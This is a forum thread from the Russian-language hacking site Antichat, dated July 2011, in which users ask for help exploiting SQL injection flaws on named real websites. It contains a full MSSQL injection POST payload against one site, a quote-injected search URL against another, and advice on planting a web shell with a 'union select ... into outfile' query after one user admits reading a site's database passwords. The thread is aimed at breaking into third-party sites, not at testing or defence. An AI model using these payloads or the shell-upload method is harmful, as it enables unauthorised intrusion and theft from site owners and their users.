ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
28.07.2011, 21:32
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от Cherep
у меня какбы заходит спокойно по адресу шелла. И что делать?
Использовать поиск по форуму: /showthread.php?t=191917
И внимательно читать не только первый пост.
|
|
|
28.07.2011, 21:44
|
|
Участник форума
Регистрация: 19.12.2010
Сообщений: 155
Провел на форуме:
30555
Репутация:
85
|
|
Помогите раскрутить SQL inj
Уязвимая страница
Код:
http://www.allyachts.ru/YachtsSearch.asp?ret=2
POST запросом отсылаем
Код:
actSearche=1&selectsearche=0&intsearche=2&strsearche=%26verf%3D%26Kind%3D%26intsearcheto1%3D85%26intsearchefrom1%3D2%2C35%26intsearcheto2%3D30%26intsearchefrom2%3D0%27&ID_Employees=&ID_Purpose=&ID_KindOfYachts=&ID_SeaWorthiness=&ID_MaterialBody=&ID_Engine=&ID_IntSearche1=1&intsearchefrom1=2%2C35&ifmin1=2%2C35&intsearcheto1=85&ifmax1=85&ID_IntSearche2=INJECTION&intsearchefrom2=0&ifmin2=0&intsearcheto2=30&ifmax2=30
тип БД - MSSQL
Описание проблемы
Сообщение от None
Там уязвимые поля имеют числовой тип в итоге чтобы туда я не писал сервер пытается сконвертить ответ в число что у него конечно не получается, вот и нашел другие параметры но в этих параметрах у меня не получается вызвать какую-либо реакцию, может быть у меня опять че-то замкнуло?
|
|
|
|
28.07.2011, 22:14
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от eclipse
Помогите раскрутить SQL inj
Уязвимая страница
Код:
http://www.allyachts.ru/YachtsSearch.asp?ret=2
POST запросом отсылаем
Код:
actSearche=1&selectsearche=0&intsearche=2&strsearche=%26verf%3D%26Kind%3D%26intsearcheto1%3D85%26intsearchefrom1%3D2%2C35%26intsearcheto2%3D30%26intsearchefrom2%3D0%27&ID_Employees=&ID_Purpose=&ID_KindOfYachts=&ID_SeaWorthiness=&ID_MaterialBody=&ID_Engine=&ID_IntSearche1=1&intsearchefrom1=2%2C35&ifmin1=2%2C35&intsearcheto1=85&ifmax1=85&ID_IntSearche2=INJECTION&intsearchefrom2=0&ifmin2=0&intsearcheto2=30&ifmax2=30
тип БД - MSSQL
Описание проблемы Эту скулю не раскрутить
|
|
|
|
28.07.2011, 23:58
|
|
Участник форума
Регистрация: 19.12.2010
Сообщений: 155
Провел на форуме:
30555
Репутация:
85
|
|
Сообщение от None
Эту скулю не раскрутить
С чего ты взял? Аргументируй пож.
|
|
|
|
29.07.2011, 00:30
|
|
Участник форума
Регистрация: 08.03.2011
Сообщений: 149
Провел на форуме:
34360
Репутация:
1
|
|
Всем привет. Нашёл скулю на одном сайтике, через её посмотрел конфиг с паролями от БД, но муадмин не нашёл. Пробовал через шелл законектится с другого хоста, безрезультатно. Что можно сделать? очень нужен там шелл.
|
|
|
|
29.07.2011, 01:54
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от plaeer
Всем привет. Нашёл скулю на одном сайтике, через её посмотрел конфиг с паролями от БД, но муадмин не нашёл. Пробовал через шелл законектится с другого хоста, безрезультатно. Что можно сделать? очень нужен там шелл.
если через скуль прочитал файл то через нее же попробуй залить шелл, для этого тебе надо знать относительный путь сайта и найти директорию разрешенную для заливки файлов
Сообщение от None
*.php?id=-1 union select 'код шела или уплодера' into outfile '/путь до сайта с папкой разрешенной для заливки файлов/shell.php'+--+
|
|
|
|
29.07.2011, 02:13
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Кинь сайт в ПМ.
|
|
|
|
29.07.2011, 11:30
|
|
Новичок
Регистрация: 02.06.2010
Сообщений: 0
Провел на форуме:
2461
Репутация:
0
|
|
Можно как нить раскрутить вот это - http://ugroza.net:80/index.php?do=search&subaction=search&search_start= 0&full_search=0&result_from=1&result_num=20&story= admin&dosearch=admin&titleonly=0&searchuser=\'&exa ctname=yes&replyless=0&replylimit=0&searchdate=0&b eforeafter=after&sortby=date&resorder=desc&showpos ts=0&catlist[]=0&doclear=admin
Заранее спасибо
|
|
|
|
29.07.2011, 13:36
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от eternal stud
eternal stud said:
Можно как нить раскрутить вот это - http://ugroza.net:80/index.php?do=search&subaction=search&search_start= 0&full_search=0&result_from=1&result_num=20&story= admin&dosearch=admin&titleonly=0&searchuser=\'&exa ctname=yes&replyless=0&replylimit=0&searchdate=0&b eforeafter=after&sortby=date&resorder=desc&showpos ts=0&catlist[]=0&doclear=admin
Заранее спасибо
нет, ковычки либо слешируются, либо вырезаются(и не только кавычки). Все параметры, вставляющие в запрос к базе, обрамлены кавычками.
|
|
|
|
29.07.2011, 16:56
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585
Репутация:
0
|
|
Сообщение от Expl0ited
Использовать поиск по форуму: /showthread.php?t=191917
И внимательно читать не только первый пост.
прочитал всёравно ничего полезного не нашел. Может ктонить помочь плз?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
